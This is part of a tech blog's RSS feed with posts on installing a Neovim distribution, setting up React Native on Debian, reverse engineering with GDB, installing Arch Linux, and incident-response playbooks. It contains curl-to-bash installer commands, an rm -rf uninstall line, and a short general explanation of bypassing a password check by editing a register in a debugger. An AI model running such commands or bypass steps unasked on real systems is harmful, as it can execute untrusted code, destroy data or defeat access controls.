]]></content:encoded></item><item><title><![CDATA[🐲 Clax.nvim: A Lightning-Fast Neovim Distribution]]></title><description><![CDATA[Neovim enthusiasts, rejoice! Today, we're excited to introduce Clax.nvim, a carefully crafted Neovim distribution designed for speed, simplicity, and customization. Whether you're a seasoned developer or just starting with Neovim, Clax.nvim promises ...]]></description><link>https://blog.berzi.one/claxnvim-a-lightning-fast-neovim-distribution</link><guid isPermaLink="true">https://blog.berzi.one/claxnvim-a-lightning-fast-neovim-distribution</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 11 Jan 2024 16:25:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704989076254/d8365b99-6814-47d6-a195-3f73dc2e7d74.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Neovim enthusiasts, rejoice! Today, we're excited to introduce Clax.nvim, a carefully crafted Neovim distribution designed for speed, simplicity, and customization. Whether you're a seasoned developer or just starting with Neovim, Clax.nvim promises to deliver a seamless and efficient editing experience. Let's dive into the key features, installation instructions, and usage guide to get you started on your coding journey with Clax.nvim.</p>
<h2 id="heading-what-is-claxnvim">What is Clax.nvim?</h2>
<p>Clax.nvim is not just another Neovim configuration; it's a distribution tailored for performance and ease of use. Named in homage to a friend (in a humorous attempt to convince them to install Arch Linux), Clax.nvim aims to be a lightweight and user-friendly choice for Neovim users. Let's explore what makes Clax.nvim stand out.</p>
<h2 id="heading-features">Features:</h2>
<h3 id="heading-1-blazing-speed">1. Blazing Speed:</h3>
<p>Clax.nvim is optimized for speed, ensuring a snappy and responsive editing environment, even when dealing with large codebases. Experience the joy of efficient coding without any compromise on performance.</p>
<h3 id="heading-2-lightweight-design">2. Lightweight Design:</h3>
<p>Say goodbye to unnecessary bloat! Clax.nvim keeps things minimal, providing a streamlined setup that offers both performance and simplicity. Enjoy the power of Neovim without the baggage.</p>
<h3 id="heading-3-user-friendly-interface">3. User-Friendly Interface:</h3>
<p>Designed with beginners in mind, Clax.nvim offers an intuitive configuration that's easy to understand and use right out of the box. Whether you're a coding veteran or a novice, Clax.nvim adapts to your workflow.</p>
<h3 id="heading-4-customizable">4. Customizable:</h3>
<p>Tailor your Neovim experience to your preferences with extensive customization options. Whether you're a minimalist or a power user, Clax.nvim allows you to shape your coding environment to suit your needs.</p>
<h3 id="heading-5-packernvim-integration">5. Packer.nvim Integration:</h3>
<p>Effortlessly manage plugins with Packer.nvim, ensuring a clean and organized configuration that's easy to maintain. Clax.nvim leverages the power of Packer.nvim for efficient plugin management.</p>
<h2 id="heading-installation">Installation:</h2>
<p>Getting started with Clax.nvim is a breeze. Follow these simple steps to set up your Neovim environment:</p>
<ol>
<li><p><strong>Clone Packer.nvim and Source Files:</strong></p>
<pre><code class="lang-bash"> mkdir ~/.config/nvim

 git <span class="hljs-built_in">clone</span> --depth 1 https://github.com/wbthomason/packer.nvim \
 ~/.<span class="hljs-built_in">local</span>/share/nvim/site/pack/packer/start/packer.nvim

 git <span class="hljs-built_in">clone</span> -b dev --depth 1 https://github.com/spirizeon/clax.nvim
</code></pre>
</li>
<li><p><strong>Install Packer Modules:</strong></p>
<pre><code class="lang-bash"> <span class="hljs-built_in">cd</span> clax.nvim
 cp init.lua ~/.config/nvim/
 nvim +PackerInstall <span class="hljs-comment"># Press [ENTER] at any prompts</span>
</code></pre>
</li>
<li><p><strong>Set the Custom Theme and Update the Config:</strong></p>
<pre><code class="lang-bash"> cp clax.lua ~/.<span class="hljs-built_in">local</span>/share/nvim/site/pack/packer/start/startup.nvim/lua/startup/themes/
</code></pre>
</li>
<li><p><strong>Install Treesitter Modules:</strong></p>
<pre><code class="lang-bash"> nvim <span class="hljs-comment"># Open Neovim to install treesitter modules</span>
 nvim +PackerSync <span class="hljs-comment"># Press [ENTER] at any prompts</span>
</code></pre>
</li>
<li><p><strong>Exit and Restart Neovim:</strong></p>
<pre><code class="lang-bash"> nvim
</code></pre>
</li>
</ol>
<p>Now you're ready to enjoy the speed and features of Clax.nvim!</p>
<h2 id="heading-configuration">Configuration:</h2>
<p>Explore the <code>init.lua</code> file to customize keybindings, plugins, and other settings to suit your workflow. The Packer.nvim integration provides a clean and organized way to manage your plugins. Take your time to fine-tune Clax.nvim to your liking.</p>
<h2 id="heading-usage-and-keymaps">Usage and Keymaps:</h2>
<p>Clax.nvim comes with pre-configured keymaps for popular plugins. Here are some keybindings to enhance your Neovim experience:</p>
<ul>
<li><p><code>&lt;leader&gt;ff</code>: Open Telescope and find files.</p>
</li>
<li><p><code>&lt;leader&gt;lg</code>: Use Telescope to perform a live grep.</p>
</li>
<li><p><code>&lt;leader&gt;fb</code>: Switch between open buffers with Telescope.</p>
</li>
<li><p><code>&lt;leader&gt;of</code>: Access and navigate old files with Telescope.</p>
</li>
<li><p><code>&lt;leader&gt;nf</code>: Create a new file with a single command.</p>
</li>
</ul>
<p>Feel free to explore more keymaps and commands in the configuration to make the most out of Clax.nvim.</p>
<h2 id="heading-uninstall">Uninstall:</h2>
<p>If you ever decide to part ways with Clax.nvim, uninstalling is a breeze. Simply run the following command:</p>
<pre><code class="lang-bash">rm -rf ~/.config/nvim ~/.<span class="hljs-built_in">local</span>/share/nvim
</code></pre>
<h2 id="heading-contribute">Contribute:</h2>
<p>We welcome contributions from the Neovim community! Whether it's bug fixes, new features, or optimizations, feel free to open issues and pull requests on our <a target="_blank" href="https://github.com/spirizeon/clax.nvim">GitHub repository</a>.</p>
<p>Join our growing community and help make Clax.nvim even better!</p>
<p>Happy coding! 🚀</p>
]]></content:encoded></item><item><title><![CDATA[🧑‍💻 React Native CLI for Linux]]></title><description><![CDATA[For the setup of environment of "React Native" on the Debian based distros you have to follow the following steps .
This part of the setup is only for the general installation 
without any errors.


First you need to visit this VoltaJs to install nod...]]></description><link>https://blog.berzi.one/react-native-cli-for-linux</link><guid isPermaLink="true">https://blog.berzi.one/react-native-cli-for-linux</guid><category><![CDATA[React Native]]></category><category><![CDATA[linux for beginners]]></category><dc:creator><![CDATA[Yash Mehrotra]]></dc:creator><pubDate>Wed, 10 Jan 2024 14:10:58 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704895833253/559f73ad-2cf6-4af3-a0c0-ff5ff796fbcc.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>For the setup of environment of "React Native" on the Debian based distros you have to follow the following steps .</p>
<pre><code class="lang-plaintext">This part of the setup is only for the general installation 
without any errors.
</code></pre>
<ul>
<li><p>First you need to visit this <a target="_blank" href="https://volta.sh/">VoltaJs</a> to install node from it (I am suggesting VoltaJs because its a good version control for node versions. )</p>
<p>  OR</p>
<p>  You can follow these commands to install VoltaJs and then Node</p>
<pre><code class="lang-bash">  <span class="hljs-comment"># install Volta</span>
  curl https://get.volta.sh | bash

  <span class="hljs-comment">#To execute the paths in Bashrc</span>
  <span class="hljs-built_in">source</span> ~/.bashrc

  <span class="hljs-comment"># install Node</span>
  volta install node

  <span class="hljs-comment"># Check the Version of node</span>
  node --version
</code></pre>
</li>
<li><p>Then after the installation of node you need to install the sdk man from this website <a target="_blank" href="https://sdkman.io/">SDKman</a> to install JAVA from it (I am suggesting SDKman because its a good version control for java versions.)</p>
<p>  OR</p>
<pre><code class="lang-bash">  <span class="hljs-comment"># To install SDKman in your system</span>
  curl -s <span class="hljs-string">"https://get.sdkman.io"</span> | bash

  <span class="hljs-comment"># To execute the paths in Bashrc</span>
  <span class="hljs-built_in">source</span> ~/.bashrc

  <span class="hljs-comment"># To check the versions of JAVA </span>
  sdk list java

  <span class="hljs-comment"># To install the JAVA version 17.0.9(recommended stabel)</span>
  sdk install java 17.0.9-ms
</code></pre>
</li>
<li><p>After the installation of JAVA you need to install Android Studio you can either install it from <a target="_blank" href="https://developer.android.com/studio?gclid=Cj0KCQiAnfmsBhDfARIsAM7MKi3-LhB2iS3VDTX5F--OA_Cwm_azPDHyh-6ISQPjzsDk6UiBV8R7xY0aAlNnEALw_wcB&amp;gclsrc=aw.ds">Android Studio</a></p>
</li>
<li><p>After the installation of Android Studio you need to install all the sdk tools as indicated in the following images (<mark>ticked one's only</mark>)</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704893844371/fb6e5f82-c274-4f77-bbde-9ef0173b901c.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704893859802/221b837c-ceb4-4b55-8ac3-fa5889b9b815.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p>After the installation of the following tools now you need to add the path of Android Studio and its Sdk files into your <mark>~/.</mark><strong><mark>bashrc</mark></strong> copy the following path into your ~/.bashrc</p>
<pre><code class="lang-bash">  <span class="hljs-built_in">export</span> ANDROID_HOME=<span class="hljs-variable">$HOME</span>/Android/Sdk
  <span class="hljs-built_in">export</span> PATH=<span class="hljs-variable">$PATH</span>:<span class="hljs-variable">$ANDROID_HOME</span>/emulator
  <span class="hljs-built_in">export</span> PATH=<span class="hljs-variable">$PATH</span>:<span class="hljs-variable">$ANDROID_HOME</span>/platform-tools
</code></pre>
</li>
<li><p>After adding the path and full installation of node and java you can now create a <strong>react-native</strong> project by typing the following command .</p>
<pre><code class="lang-bash">  <span class="hljs-comment">#Before writting this command you need get into the </span>
  <span class="hljs-comment">#directory of your liking and then use the following command</span>
  npx react-native@latest init AwesomeProject
</code></pre>
</li>
<li><p>Now you need to open <strong>Android Studio</strong> with the {Folder you created with the command present above} and select android folder from the folder like its shown in the image below and then click on the <mark>OK</mark> and then let the Android Studio build the Gradel (<strong><mark>Gradel build will take some time be patient</mark></strong>).</p>
<p>  <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704894940608/4740a103-9d35-424a-8391-cb40822629df.png" alt class="image--center mx-auto" /></p>
</li>
<li><p><strong><mark>After the Gradel build it will take time to set the Indexing don't close the Android Studio just after Gradel Build or the app may crash if you do so .</mark></strong></p>
</li>
</ul>
<h3 id="heading-your-setup-for-react-native-has-been-done-for-debian-based-distros">Your setup for react-native has been done for Debian based Distros</h3>
<p><strong>Now you can simply get into your directory and type</strong></p>
<pre><code class="lang-bash"><span class="hljs-comment"># Please use this command only after getting into ypur project directory and it must conatine a file named with package.json</span>
 npm start
</code></pre>
<h2 id="heading-enjoy">Enjoy!!!</h2>
]]></content:encoded></item><item><title><![CDATA[🦾 Reverse engineering code with Assembly]]></title><description><![CDATA[CPU Registers
Registers is a small amount of fast storage element into the processor. It is faster than cache memory due to the smaller size and proximity with the CPU itself.
We will use the GDB or GNU Debugger for demonstration purposes here.
(gdb)...]]></description><link>https://blog.berzi.one/reverse-engineering-code-with-assembly</link><guid isPermaLink="true">https://blog.berzi.one/reverse-engineering-code-with-assembly</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 04 Jan 2024 14:33:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704378768242/ce6ac4f7-602a-4336-86e4-4070f20a024c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3 id="heading-cpu-registers">CPU Registers</h3>
<p>Registers is a small amount of fast storage element into the processor. It is faster than cache memory due to the smaller size and proximity with the CPU itself.</p>
<p>We will use the <code>GDB</code> or GNU Debugger for demonstration purposes here.</p>
<pre><code class="lang-plaintext">(gdb) info registers
rax            0x0          0
rbx            0x7fffffffe3c8      140737488348104
rcx            0x7ffff7f9a680      140737353721472
rdx            0x7fffffffe3d8      140737488348120
rsi            0x7fffffffe3c8      140737488348104
rdi            0x1                 1
rbp            0x7fffffffe2b0      0x7fffffffe2b0
rsp            0x7fffffffe2b0      0x7fffffffe2b0
</code></pre>
<p>here <code>rax</code> is a register variable. Where its value is 0 at the moment.</p>
<h3 id="heading-understanding-assembly-skim-perspective">Understanding Assembly (skim-perspective)</h3>
<p>All code once compiled/interpreted completely, is basically converted into machine code or assembly language. Although it is quite difficult to understand, we can point out certain patterns in it. Let's take a look at this assembly dump here:</p>
<pre><code class="lang-plaintext">  (gdb) disassembly main
   0x00000000004005ea &lt;+45&gt;:    call   0x400490 &lt;printf@plt&gt;
   0x00000000004005ef &lt;+50&gt;:    mov    -0x10(%rbp),%rax
   0x00000000004005f3 &lt;+54&gt;:    add    $0x8,%rax
   0x00000000004005f7 &lt;+58&gt;:    mov    (%rax),%rax
   0x00000000004005fa &lt;+61&gt;:    mov    $0x4006da,%esi
   0x00000000004005ff &lt;+66&gt;:    mov    %rax,%rdi
   0x0000000000400602 &lt;+69&gt;:    call   0x4004b0 &lt;strcmp@plt&gt;
   0x0000000000400607 &lt;+74&gt;:    test   %eax,%eax
   0x0000000000400609 &lt;+76&gt;:    jne    0x400617 &lt;main+90&gt;
   0x000000000040060b &lt;+78&gt;:    mov    $0x4006ea,%edi
   0x0000000000400610 &lt;+83&gt;:    call   0x400480 &lt;puts@plt&gt;
   0x0000000000400615 &lt;+88&gt;:    jmp    0x40062d &lt;main+112&gt;
</code></pre>
<p>In here, at the <code>0x00000000004005ea</code> or the <code>5ea</code> line location/memory address, the <code>&lt;printf@plt&gt;</code> statement basically means that a <code>printf()</code> function is being <code>call</code>ed.</p>
<p>When we look at the manual for the <code>printf()</code> statement, it means that some message is being printed on the console.</p>
<p>Hence, we can conclude that one does not need to know assembly in depth to understand its code.</p>
<h3 id="heading-constructing-control-flow-and-branches">Constructing control flow and branches</h3>
<p>let's take a look at this particular section from the assembly dump:</p>
<pre><code class="lang-plaintext">   0x0000000000400602 &lt;+69&gt;:    call   0x4004b0 &lt;strcmp@plt&gt;
   0x0000000000400607 &lt;+74&gt;:    test   %eax,%eax
   0x0000000000400609 &lt;+76&gt;:    jne    0x400617 &lt;main+90&gt;
</code></pre>
<p>a function of <code>strcmp()</code> is called which means two strings are compared (according to its definition), two variables are being compared and checked if they are the same or not. In <code>0x0000000000400607 &lt;+74&gt;: test %eax,%eax</code>, we are checking the value of the register variable <code>eax</code> ,which denotes the first 32 bits of the 64 bit long capacity of the 64 bit variable <code>rax</code> we encountered in the output displayed at the top in 'CPU registers'.</p>
<p>In the last line, the <code>jne</code> command translates to <code>jump when false</code> with the specification to jump to the memory address of the <code>main+90</code>.</p>
<p>Just like that we construct a diagram or flowchart for the control flow of the entire program:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704378062323/3fa48c86-2a9d-4d4c-a9e7-215b3e909864.png" alt class="image--center mx-auto" /></p>
<blockquote>
<p>(please note that this is not accurate or usable code)</p>
</blockquote>
<h3 id="heading-cracking">Cracking</h3>
<p>Cracking is the process of breaking into and executing portions protected or protected code. It is considered a part of reverse-engineering.</p>
<p>From the previous topic, we can easily look into the register values, and the functions to take the control flow pointer or <code>rip</code> to that particular location of code which we wish to access. In the given section, we can make adjustments to <code>rax</code> by changing the value of <code>eax</code> to 0 through GDB or some similar debugger to make the program think that we the <code>strcmp</code> function is returning the FALSE value. So when we run the program from that particular set breakpoint, we will be able to access that particular portion of code that is only run if <code>strcmp</code> return FALSE.</p>
<p>How can we relate this to a real-life example? Password-protected applications is the key.</p>
<h3 id="heading-some-extra-reads">Some extra reads:</h3>
<ul>
<li><p><a target="_blank" href="https://ee.hawaii.edu/~tep/EE160/Book/chap14/subsection2.1.1.2.html">https://ee.hawaii.edu/~tep/EE160/Book/chap14/subsection2.1.1.2.html</a></p>
</li>
<li><p><a target="_blank" href="https://www.geeksforgeeks.org/gdb-step-by-step-introduction/">https://www.geeksforgeeks.org/gdb-step-by-step-introduction/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🛠️ Setting up Arch]]></title><description><![CDATA[Downloading the ISO
An ISO is an image of the operating system. It acts as the installer for the operating system.
The ISO can be downloaded from one of ArchLinux's global mirrors, and flashed to create a bootable USB.
Setting up Ventoy: Flashing mul...]]></description><link>https://blog.berzi.one/setting-up-arch</link><guid isPermaLink="true">https://blog.berzi.one/setting-up-arch</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 31 Dec 2023 14:12:46 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704031220421/19673a27-a88f-437f-ae4a-70ff97fb9809.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-downloading-the-iso">Downloading the ISO</h2>
<p>An ISO is an image of the operating system. It acts as the installer for the operating system.</p>
<p>The ISO can be downloaded from one of ArchLinux's global mirrors, and flashed to create a bootable USB.</p>
<h3 id="heading-setting-up-ventoy-flashing-multiple-isos-to-one-usb">Setting up Ventoy: Flashing multiple ISOs to one USB</h3>
<p>Just to be safe, we will use Ventoy to flash at least two different ISOs to our USB stick to make sure that if installing Arch is not possible for some case, we can always install some other linux distribution. However this is a very rare case because people don't usually sole-install Arch on their devices.</p>
<p>Link to installing: <a target="_blank" href="https://github.com/ventoy/Ventoy">Ventoy</a></p>
<p>Let's assume that we are already on a Linux distribution (If you are on Windows, please follow <a target="_blank" href="https://www.ventoy.net/en/doc_start.html">this guide</a> ). After we install the Ventoy binary, we will run it with this command:</p>
<pre><code class="lang-bash">$ sh Ventoy2Disk.sh -i /dev/sdX
</code></pre>
<p>where <code>/dev/sdX</code> is the device file name for our USB, we can know what that is through the <code>fdisk -l</code> command.</p>
<p>After Ventoy is installed, we can simply drag and drop our ArchLinux ISO into our flash drive's directory.</p>
<h2 id="heading-diving-into-arch-first-boot">Diving into Arch: First boot</h2>
<p>We will be greeted with a command line after we select the first option from the boot loader.</p>
<p><img src="https://imageio.forbes.com/blogs-images/jasonevangelho/files/2019/06/arch-script-e1560162541576.png?format=png&amp;height=600&amp;width=1200&amp;fit=bounds" alt="Arch Linux OS Challenge: Install Arch 'The Easy Way' With These 2  Alternative Methods" /></p>
<h3 id="heading-connecting-wi-fi">Connecting wi-fi</h3>
<p>In most cases of a home computer, we may not have an ethernet cable laying around, so, we will connect our computer to wi-fi with <code>iwctl</code> utility.</p>
<p>Simply typing <code>iwctl</code> will open the <code>iwd</code> shell prompt. From here we must type the following command to view all our network devices:</p>
<pre><code class="lang-bash">$ [iwd]: device list
</code></pre>
<p>After we grab our device. We will make it scan for active wi-fi networks and display them:</p>
<pre><code class="lang-bash">$ [iwd]: station &lt;device_name&gt; scan
$ [iwd]: station &lt;device_name&gt; get-networks
</code></pre>
<p>Then select and connect to the network:</p>
<pre><code class="lang-bash">$ [iwd]: station &lt;device_name&gt; connect &lt;wifi_name&gt;
</code></pre>
<p>We will be asked to pitch in the password for that <code>SSID</code>. After we connect, we can test our connection with the <code>ping</code> command. And press <code>CTRL-C</code> to stop pinging. This is optional.</p>
<h2 id="heading-partitioning-drives">Partitioning drives</h2>
<p>We will use the <code>cfdisk</code> utility to edit our drive partitions.</p>
<pre><code class="lang-bash">$ cfdisk /dev/sdY
</code></pre>
<p>here <code>/dev/sdY</code> is the device file name for the drive whose partitions we want to edit. We will assume that we are clean installing Arch on the entire drive.</p>
<p><img src="https://upload.wikimedia.org/wikipedia/commons/8/85/Cfdisk_screenshot.png" alt="cfdisk - Wikipedia" /></p>
<p>In order to delete existing partitions, we will simple hover over the partition section with arrow keys and press delete.</p>
<p>After we select and enter <code>write</code>, our formatting is done. Let's create our new partitions now.</p>
<p>We will click on <code>new</code> then give the first partition a size of <code>100M</code> meaning 100 megabytes, this will house the boot loader for our distribution.</p>
<p>After pressing enter, we will hover back to <code>free space</code> and repeat the process. This time we will give it a size of <code>4G</code>. This will be house the <code>swap</code> memory for our distribution. It is that part of the drive which can be used as extra memory incase our RAM fills up.</p>
<p>Lastly, we will select free-space and not edit the default size suggested. Which will be all of the remaining part. This will house our files.</p>
<p>After everything's done. We will click <code>write</code> then <code>primary</code> then enter. Then quit.</p>
<h2 id="heading-building-and-mounting-file-systems">Building and mounting file systems</h2>
<p>We can know our partition names and size from the <code>lsblk</code> command.</p>
<pre><code class="lang-bash">$ mkfs.fat -F 32 &lt;boot_partition&gt;
$ mkswap &lt;swap_partition&gt;
$ mkfs.btrfs &lt;storage_partition&gt;
</code></pre>
<p>Here, we are using <code>FAT32</code>, <code>SWAP</code>, and <code>btrfs</code> file systems for our partitions. They are, almost the most optimal choices for file systems for these partitions.</p>
<p>After that, we will mount or make the file systems accessible from Arch.</p>
<pre><code class="lang-bash">$ mkdir -p /mnt/boot/efi
$ mount &lt;boot_partition&gt; /mnt/boot/efi
$ swapon &lt;swap_partition&gt;
$ mount &lt;storage_partition&gt; /mnt
</code></pre>
<p>Here, we are creating the <code>boot</code> and then nesting that with the <code>efi</code> directory to store the boot partition.</p>
<p>We are mounting the rest of the partitions to their required position.</p>
<h2 id="heading-installing-essential-packages">Installing essential packages</h2>
<p>Now, we are ready to install the core packages of our system.</p>
<pre><code class="lang-bash">$ pacstrap -K /mnt base linux linux-firmware sof-firmware base-devel nano networkmanager grub
</code></pre>
<p>We are installing the Linux kernel, sound-card firmware (for newer) systems, build-tools, network manager, the GRUB boot-loader and a text editor for editing system config files.</p>
<h3 id="heading-generating-the-fstab-file">Generating the fstab file</h3>
<pre><code class="lang-bash">$ genfstab -U /mnt &gt; /mnt/etc/fstab
</code></pre>
<p><code>fstab</code> is our Linux system's filesystem table, aka fstab , which is a configuration table designed <strong>to ease the burden of mounting and unmounting file systems to a machine.</strong></p>
<p>Time to enter our newly installed arch system:</p>
<pre><code class="lang-bash">$ arch-chroot /mnt
</code></pre>
<h2 id="heading-system-configurations">System configurations</h2>
<p>We can set the time zone with the following command</p>
<pre><code class="lang-bash">$ ln -sf /usr/share/zoneinfo/Region/City /etc/localtime
$ hwclock --systohc
</code></pre>
<p>where <code>Region/City</code> is your region (Just click TAB to set it as you go). The second command syncs the system clock with the set timezone.</p>
<p>Generating 'locale's or general configurations that are to be used by all or most programs can be done with this:</p>
<pre><code class="lang-bash">$ locale-gen
$ <span class="hljs-built_in">echo</span> <span class="hljs-string">'LANG=en_US.UTF-8'</span> &gt; /etc/locale.conf
$ <span class="hljs-built_in">echo</span> <span class="hljs-string">'KEYMAP=us'</span> &gt; /etc/vconsole.conf
</code></pre>
<p>Creating the hostname file for our system</p>
<pre><code class="lang-bash">$ <span class="hljs-built_in">echo</span> <span class="hljs-string">'&lt;hostname&gt;'</span> &gt; /etc/hostname
</code></pre>
<h2 id="heading-root-and-user-configuration">Root and User configuration</h2>
<pre><code class="lang-bash">$ passwd
$ useradd -m -G wheel ‘USERNAME’
$ passwd ‘USERNAME’
</code></pre>
<p>This will prompt us for the root password. Then create a user and add it to the group <code>wheel</code>. Lastly we will set the password for this user.</p>
<p>It's time to add root privileges to this user.</p>
<pre><code class="lang-bash">$ EDITOR=nano visudo
</code></pre>
<p>Over here, we will head over to the first statement and look for the line:</p>
<pre><code class="lang-bash"><span class="hljs-comment">#%wheel%   ALL=(ALL:ALL) ALL</span>
</code></pre>
<p>we will uncomment this line to enable all users underneath this group to have root privileges. Exit nano with <code>CTRL+S</code> and <code>CTRL+X</code>.</p>
<p>Update the packages:</p>
<pre><code class="lang-bash">$ pacman -Syu
</code></pre>
<h2 id="heading-installing-grub-boot-loader">Installing GRUB boot-loader</h2>
<pre><code class="lang-bash">$ grub-install &lt;drive_name&gt;
</code></pre>
<p>we can replace <code>&lt;drive_name&gt;</code> with the device file name for our drive (Not partition).</p>
<h2 id="heading-finishing-steps">Finishing steps</h2>
<p>we will unmount the <code>/mnt</code> directory and reboot into our new system!</p>
<pre><code class="lang-bash">$ umount -R /mnt
$ reboot
</code></pre>
<p>Please remove the USB after the screen goes blank after the <code>reboot</code> command. We now boot into a fresh install of ArchLinux!</p>
<p>It is advisable to install a desktop environment like <code>GNOME</code> if you are using it as a daily driver. Just login now. Welcome!</p>
<h2 id="heading-some-extra-reads">Some extra reads:</h2>
<ul>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/installation_guide">https://wiki.archlinux.org/title/installation_guide</a></p>
</li>
<li><p><a target="_blank" href="https://www.ventoy.net/en/doc_start.html">https://www.ventoy.net/</a></p>
</li>
<li><p><a target="_blank" href="https://guese-justin.medium.com/installing-arch-linux-the-easy-way-with-encrypted-drives-for-deep-learning-83fd55035ff7">https://guese-justin.medium.com/installing-arch-linux-the-easy-way-with-encrypted-drives-for-deep-learning-83fd55035ff7</a></p>
</li>
<li><p><a target="_blank" href="https://www.sciencedirect.com/topics/computer-science/boot-partition">https://www.sciencedirect.com/topics/computer-science/boot-partition</a></p>
</li>
<li><p><a target="_blank" href="https://docs.oracle.com/cd/E19253-01/817-2521/overview-39/index.html">https://docs.oracle.com/cd/E19253-01/817-2521/overview-39/index.html</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/Linux_console/Keyboard_configuration">https://wiki.archlinux.org/title/Linux_console/Keyboard_configuration</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[📕 Blue Team: Playbooks]]></title><description><![CDATA[A cybersecurity playbook is a guidebook that keeps getting updated with lessons learnt post-incident. It is a comprehensive roadmap on how to deal with attacks revolving around specific concepts like spyware, SQL injection, etc. However, they have sp...]]></description><link>https://blog.berzi.one/blue-team-playbooks</link><guid isPermaLink="true">https://blog.berzi.one/blue-team-playbooks</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Wed, 27 Dec 2023 17:10:49 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1703694285138/32165e24-0355-49d8-bfa3-abd3ab1df245.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A cybersecurity playbook is a guidebook that keeps getting updated with lessons learnt post-incident. It is a comprehensive roadmap on how to deal with attacks revolving around specific concepts like spyware, SQL injection, etc. However, they have specific rules as to how and on what grounds they are allowed to be updated which varies among firms.</p>
<p><img src="https://www.fortinet.com/blog/ciso-collective/incident-response-plans-playbooks-policy/_jcr_content/root/responsivegrid/table_content/par/image.img.png/1702704276344/fortinet-incident-response-policy-playbook-diagram.png" alt="Fortinet diagram on incident response, policy, and playbooks." /></p>
<h4 id="heading-incident-response-plan-vs-incident-response-playbook">Incident Response plan vs. Incident Response playbook</h4>
<p>Incident response plans are summarized steps on how to deal with an incident, while playbooks are more elaborated guides that helps refine the solution to the specific security concern.</p>
<h4 id="heading-phases-of-incident-response-security-playbooks">Phases of Incident response security playbooks</h4>
<ul>
<li><p>Prepare: Make effort to create a good security posture to avoid an incident, create security playbooks, train personnel, exercise security-breach drills.</p>
</li>
<li><p>Detection and analysis: Use SIEM (System Information and Event Management) , IDS (Intrusion Detection System) or IPS (Intrusion Prevention System) tools to monitor metrics (Factors like response times, failure rates, etc), detect, and confirm breaches. Investigate the source of the breach.</p>
</li>
<li><p>Containment: Take immediate measures to reduce further damage to organizational assets and take measures to neutralize the threat as much as possible.</p>
</li>
<li><p>Eradication and Recovery: Restore damaged assets, document the incident and update the playbook.</p>
</li>
<li><p>Collaboration: Let the concerned security team and higher authorities in the organization know about the incident.</p>
</li>
</ul>
<p>Security playbooks are essential guides that are updated through incidents and security audits. They provide a structured pathway for a security analyst to respond to an incident.</p>
<h3 id="heading-some-extra-reads">Some extra reads:</h3>
<ul>
<li><p><a target="_blank" href="https://www.cyber.gov.au/sites/default/files/2023-03/ACSC%20Cyber%20Incident%20Response%20Plan%20Guidance_A4.pdf">https://www.cyber.gov.au/sites/default/files/2023-03/ACSC%20Cyber%20Incident%20Response%20Plan%20Guidance_A4.pdf</a></p>
</li>
<li><p><a target="_blank" href="https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf">https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf</a></p>
</li>
<li><p><a target="_blank" href="https://learn.microsoft.com/en-us/security/operations/incident-response-playbooks">https://learn.microsoft.com/en-us/security/operations/incident-response-playbooks</a></p>
</li>
</ul>
]]></content:encoded></item></channel></rss>